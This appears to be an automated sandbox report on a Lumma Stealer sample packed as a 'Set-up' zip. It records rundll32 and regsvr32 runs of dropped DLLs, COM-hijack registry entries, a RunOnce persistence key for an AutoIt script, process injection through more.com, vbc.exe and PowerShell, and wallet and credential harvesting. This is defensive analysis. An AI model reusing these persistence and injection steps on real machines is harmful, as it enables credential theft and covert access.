Malware Analysis Report

2024-12-07 13:01

Sample ID 241113-sn97yatmhy
Target #Set-Uρ__3344--P𝐚SS̤̊w0rD̼S!!#.zip
SHA256 ffad20c53b74e58c7f4e3ade42368adae98e71336df074b17fc31874883a6405
Tags
discovery persistence privilege_escalation lumma spyware stealer
score
10/10

Analysis Overview

score
10/10

SHA256

ffad20c53b74e58c7f4e3ade42368adae98e71336df074b17fc31874883a6405

Threat Level: Known bad

The file #Set-Uρ__3344--P𝐚SS̤̊w0rD̼S!!#.zip was found to be: Known bad.

Malicious Activity Summary

discovery persistence privilege_escalation lumma spyware stealer

Lumma Stealer, LummaC

Lumma family

Downloads MZ/PE file

Blocklisted process makes network request

Loads dropped DLL

Uses the VBS compiler for execution

Executes dropped EXE

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Event Triggered Execution: Component Object Model Hijacking

Suspicious use of SetThreadContext

System Location Discovery: System Language Discovery

Program crash

Browser Information Discovery

Unsigned PE

Suspicious use of WriteProcessMemory

Modifies registry class

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: MapViewOfSection

Checks processor information in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-13 15:17

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:20

Platform

win10v2004-20241007-en

Max time kernel

94s

Max time network

138s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\msidcrl40.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2416 wrote to memory of 4464 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2416 wrote to memory of 4464 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2416 wrote to memory of 4464 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\msidcrl40.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\msidcrl40.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4464 -ip 4464

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 632

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 4464 -ip 4464

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 848

Network

Country Destination Domain Proto

Files

N/A

Analysis: behavioral11

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:20

Platform

win7-20240903-en

Max time kernel

118s

Max time network

120s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\access\libfilesystem_plugin.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2280 wrote to memory of 2176 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2280 wrote to memory of 2176 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2280 wrote to memory of 2176 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2280 wrote to memory of 2176 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2280 wrote to memory of 2176 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2280 wrote to memory of 2176 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2280 wrote to memory of 2176 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\access\libfilesystem_plugin.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\access\libfilesystem_plugin.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral16

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:20

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

151s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\audio_output\libdirectsound_plugin.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4804 wrote to memory of 1712 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4804 wrote to memory of 1712 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4804 wrote to memory of 1712 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\audio_output\libdirectsound_plugin.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\audio_output\libdirectsound_plugin.dll,#1

Network

Country Destination Domain Proto

Files

N/A

Analysis: behavioral18

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:20

Platform

win10v2004-20241007-en

Max time kernel

92s

Max time network

137s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\audio_output\libwasapi_plugin.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 392 wrote to memory of 3712 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 392 wrote to memory of 3712 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 392 wrote to memory of 3712 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\audio_output\libwasapi_plugin.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\audio_output\libwasapi_plugin.dll,#1

Network

Country Destination Domain Proto

Files

N/A

Analysis: behavioral23

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:20

Platform

win7-20241023-en

Max time kernel

119s

Max time network

122s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libdirect3d11_plugin.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1596 wrote to memory of 2968 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1596 wrote to memory of 2968 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1596 wrote to memory of 2968 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1596 wrote to memory of 2968 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1596 wrote to memory of 2968 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1596 wrote to memory of 2968 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1596 wrote to memory of 2968 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libdirect3d11_plugin.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libdirect3d11_plugin.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral29

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:20

Platform

win7-20241010-en

Max time kernel

118s

Max time network

121s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libvmem_plugin.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2300 wrote to memory of 2308 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2300 wrote to memory of 2308 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2300 wrote to memory of 2308 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2300 wrote to memory of 2308 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2300 wrote to memory of 2308 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2300 wrote to memory of 2308 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2300 wrote to memory of 2308 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libvmem_plugin.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libvmem_plugin.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral31

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:20

Platform

win7-20240903-en

Max time kernel

121s

Max time network

122s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\updater\nvdisps.dll

Signatures

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.AdjustDesktopSizePos\ = "AdjustDesktopSizePos Class" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{91363F1E-E7CA-4959-85D6-963719EC79FC}\VersionIndependentProgID C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.ColorSettingsAdv C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{63005CD0-8541-439c-A66A-617F4B1F2BCB}\ProgID\ = "DisplayServer.TVWizard.1" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A158544D-66FA-4F19-8806-F3CA2E2A4C52}\VersionIndependentProgID C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{91363F1E-E7CA-4959-85D6-963719EC79FC}\AppID C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEF5290C-7F3D-4640-93F2-F189DC616510}\TypeLib C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6017A978-93AD-4F2F-9E2D-07CF8C8DEBC4}\ProgID C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.SetupDigitalAudio\ = "SetupDigitalAudio Class" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{88FC94D1-2ABB-42CF-8A07-4BC54F66EDDF}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.ColorSettingsAdv\CurVer\ = "DisplayServer.ColorSettingsAdv.1" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.DualView.1\CLSID\ = "{7945F814-7BFB-4506-A113-2BD66CDC713A}" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{63005CD0-8541-439c-A66A-617F4B1F2BCB} C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{88FC94D1-2ABB-42CF-8A07-4BC54F66EDDF}\ = "CategoryMultiMon Class" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.VideoAudioControl\CurVer\ = "DisplayServer.VideoAudioControl.1" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.VideoHDCPStatus\CurVer\ = "DisplayServer.VideoHDCPStatus.1" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.SetupDigitalAudio C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{25EBA1D0-EB51-4CBE-8515-23E81DF77F97}\1.0\HELPDIR C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.RotateDisplay\CLSID C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{73BCA54E-6AEB-4597-8F27-E1284FF12722}\TypeLib C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.SetupDigitalAudio.1\ = "SetupDigitalAudio Class" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A3B877C7-83CA-4c9b-87FB-BE0D518C2441}\AppID C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B53EBC0C-2251-4AE2-9818-FD6AAF843EC2}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{AAB8F985-EADA-428B-8636-270F58E1F1EF}\ = "VideoAudioControl Class" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6E4B938E-4BA1-4E8D-BCBA-8C51CE95F94F}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.ServerMain\CLSID\ = "{73BCA54E-6AEB-4597-8F27-E1284FF12722}" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A3B877C7-83CA-4c9b-87FB-BE0D518C2441}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.AdjustSizePosExt.1 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{91363F1E-E7CA-4959-85D6-963719EC79FC}\TypeLib C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{26A37DC6-935D-439B-80DD-C1006AE13D71}\ProgID\ = "DisplayServer.Config.1" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0FB41BD0-3107-40A5-8D49-456E585947B2}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\updater\\nvdisps.dll" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6A22E68F-887C-4221-9DF1-EE0B3AC76497} C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEF5290C-7F3D-4640-93F2-F189DC616510}\ProgID\ = "DisplayServer.VideoHDCPStatus.1" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{25EBA1D0-EB51-4CBE-8515-23E81DF77F97}\1.0\ = "DisplayServer 1.0 Type Library" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6539579C-2657-45E5-985F-835E197959C2}\ProgID\ = "DisplayServer.AdjustSizePosExt.1" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.CategoryAppearance.1 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.ColorSettingsAdv\CLSID\ = "{B53EBC0C-2251-4AE2-9818-FD6AAF843EC2}" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0FB41BD0-3107-40A5-8D49-456E585947B2}\ = "IdentifyDisp Class" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1BC39379-8D90-4F18-8817-795C57163770}\ = "ScreenMove Class" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.VideoAudioControl.1 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{AAB8F985-EADA-428B-8636-270F58E1F1EF}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\updater\\nvdisps.dll" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{01367108-5EE2-4E1C-A8DE-24438065ABC9}\TypeLib\ = "{25EBA1D0-EB51-4CBE-8515-23E81DF77F97}" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{88FC94D1-2ABB-42CF-8A07-4BC54F66EDDF}\ProgID C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{91363F1E-E7CA-4959-85D6-963719EC79FC}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\updater\\nvdisps.dll" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.CustomRez.1\ = "CustomRez Class" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{49F585C0-CE12-4306-9100-B6A28857B10B}\AppID C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{7945F814-7BFB-4506-A113-2BD66CDC713A}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\updater\\nvdisps.dll" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.RotateDisplay\CLSID\ = "{6017A978-93AD-4F2F-9E2D-07CF8C8DEBC4}" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1BC39379-8D90-4F18-8817-795C57163770}\VersionIndependentProgID C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1BC39379-8D90-4F18-8817-795C57163770}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.SetupDigitalAudio.1 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{88FC94D1-2ABB-42CF-8A07-4BC54F66EDDF}\VersionIndependentProgID\ = "DisplayServer.CategoryMultiMon" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CC0648AE-7E85-483C-B1DB-9335C9D6F8C7} C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEF5290C-7F3D-4640-93F2-F189DC616510}\ = "VideoHDCPStatus Class" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{51840041-B26F-4843-B358-22ABB067396C}\VersionIndependentProgID\ = "DisplayServer.ScreenTimingDVI" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.AdjustDesktopSizePos\CLSID C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.MultiMon C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.SetupDigitalAudio\CurVer C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.CategoryAppearance.1\ = "CategoryAppearance Class" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CC0648AE-7E85-483C-B1DB-9335C9D6F8C7}\ = "ColorCorrection Class" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.MultiView\CurVer C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{80BA3813-908F-4D4C-A5FF-263640AD5B7A}\TypeLib C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.ColorSettingsAdv.1 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B53EBC0C-2251-4AE2-9818-FD6AAF843EC2}\TypeLib\ = "{25EBA1D0-EB51-4CBE-8515-23E81DF77F97}" C:\Windows\system32\regsvr32.exe N/A

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\updater\nvdisps.dll

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:20

Platform

win10v2004-20241007-en

Max time kernel

115s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Set-up.exe"

Signatures

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\RDJUYV.pif N/A

Uses the VBS compiler for execution

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\dbabech = "\"C:\\ehfecbk\\AutoIt3.exe\" C:\\ehfecbk\\dbabech.a3x" C:\Users\Admin\AppData\Roaming\RDJUYV.pif N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1852 set thread context of 4192 N/A C:\Users\Admin\AppData\Local\Temp\Set-up.exe C:\Windows\SysWOW64\more.com
PID 4144 set thread context of 4012 N/A C:\Users\Admin\AppData\Roaming\RDJUYV.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Browser Information Discovery

discovery

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\RDJUYV.pif N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Set-up.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\more.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Roaming\RDJUYV.pif N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Roaming\RDJUYV.pif N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Set-up.exe N/A
N/A N/A C:\Windows\SysWOW64\more.com N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1852 wrote to memory of 4192 N/A C:\Users\Admin\AppData\Local\Temp\Set-up.exe C:\Windows\SysWOW64\more.com
PID 1852 wrote to memory of 4192 N/A C:\Users\Admin\AppData\Local\Temp\Set-up.exe C:\Windows\SysWOW64\more.com
PID 1852 wrote to memory of 4192 N/A C:\Users\Admin\AppData\Local\Temp\Set-up.exe C:\Windows\SysWOW64\more.com
PID 1852 wrote to memory of 4192 N/A C:\Users\Admin\AppData\Local\Temp\Set-up.exe C:\Windows\SysWOW64\more.com
PID 4192 wrote to memory of 4688 N/A C:\Windows\SysWOW64\more.com C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 4192 wrote to memory of 4688 N/A C:\Windows\SysWOW64\more.com C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 4192 wrote to memory of 4688 N/A C:\Windows\SysWOW64\more.com C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 4192 wrote to memory of 4688 N/A C:\Windows\SysWOW64\more.com C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 4688 wrote to memory of 3248 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4688 wrote to memory of 3248 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4688 wrote to memory of 3248 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4192 wrote to memory of 4688 N/A C:\Windows\SysWOW64\more.com C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 4688 wrote to memory of 4144 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Users\Admin\AppData\Roaming\RDJUYV.pif
PID 4688 wrote to memory of 4144 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Users\Admin\AppData\Roaming\RDJUYV.pif
PID 4688 wrote to memory of 4144 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Users\Admin\AppData\Roaming\RDJUYV.pif
PID 4144 wrote to memory of 4604 N/A C:\Users\Admin\AppData\Roaming\RDJUYV.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 4144 wrote to memory of 4604 N/A C:\Users\Admin\AppData\Roaming\RDJUYV.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 4144 wrote to memory of 4604 N/A C:\Users\Admin\AppData\Roaming\RDJUYV.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 4144 wrote to memory of 4012 N/A C:\Users\Admin\AppData\Roaming\RDJUYV.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 4144 wrote to memory of 4012 N/A C:\Users\Admin\AppData\Roaming\RDJUYV.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
